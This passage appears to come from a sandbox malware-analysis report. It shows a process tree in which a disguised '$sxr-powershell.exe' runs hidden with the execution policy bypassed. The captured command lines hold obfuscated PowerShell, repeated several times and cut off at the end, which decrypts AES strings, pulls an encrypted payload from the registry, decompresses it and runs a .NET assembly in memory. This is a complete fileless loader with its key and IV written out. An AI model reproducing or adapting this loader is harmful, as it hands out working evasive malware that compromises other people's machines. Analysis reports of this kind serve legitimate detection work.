[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1352
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1352).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        8⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5284
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1352).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        8⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2060
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1352).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object 